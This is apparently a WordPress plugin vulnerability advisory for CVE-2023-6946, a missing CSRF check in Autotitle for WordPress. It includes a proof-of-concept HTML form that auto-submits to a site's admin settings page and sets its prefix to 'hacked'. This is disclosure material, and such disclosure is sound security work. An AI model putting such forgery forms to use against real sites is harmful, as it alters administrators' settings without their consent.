WordPress Plugin Vulnerabilities

Autotitle for WordPress <= 1.0.3 - Settings Update to Stored XSS via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=autotitle-for-wordpress.php" method="POST">
    <input type="text" name="publish_only" value="Y">
    <input type="text" name="limit" value="3">
    <input type="text" name="maxlimit" value="6">
    <input type="text" name="stoppers" value="! ? . ,">
    <input type="text" name="include_stopper" value="Y">
    <input type="text" name="exclude_stopper" value=",">
    <input type="text" name="prefix" value="hacked">
    <input type="text" name="postfix" value="">
    <input type="text" name="do" value="Update">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

Plugin icon
autotitle-for-wordpress
No known fix

References

CVE
CVE-2023-6946
URL
https://magos-securitas.com/txt/CVE-2023-6946

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://magos-securitas.com
Verified
Yes
WPVDB ID
54a00416-c7e3-44f3-8dd2-ed9e748055e6

Timeline

Publicly Published
2024-01-02 (about 4 months ago)
Added
2024-01-02 (about 4 months ago)
Last Updated
2024-01-02 (about 4 months ago)

Other

Published
Title
Published
2022-04-28
Title
Hermit <= 3.1.6 - Stored Cross-Site Scripting via CSRF
Published
2024-04-08
Title
Benchmark Email Lite < 4.2 - Cross-Site Request Forgery via page_settings()
Published
2024-04-24
Title
WP Prayer <= 2.0.9 - Settings Update via CSRF
Published
2023-06-02
Title
CRM and Lead Management by vcita <= 2.7.1 - Settings Update Via CSRF
Published
2024-02-05
Title
Contest Gallery < 21.2.9 - Cross-Site Request Forgery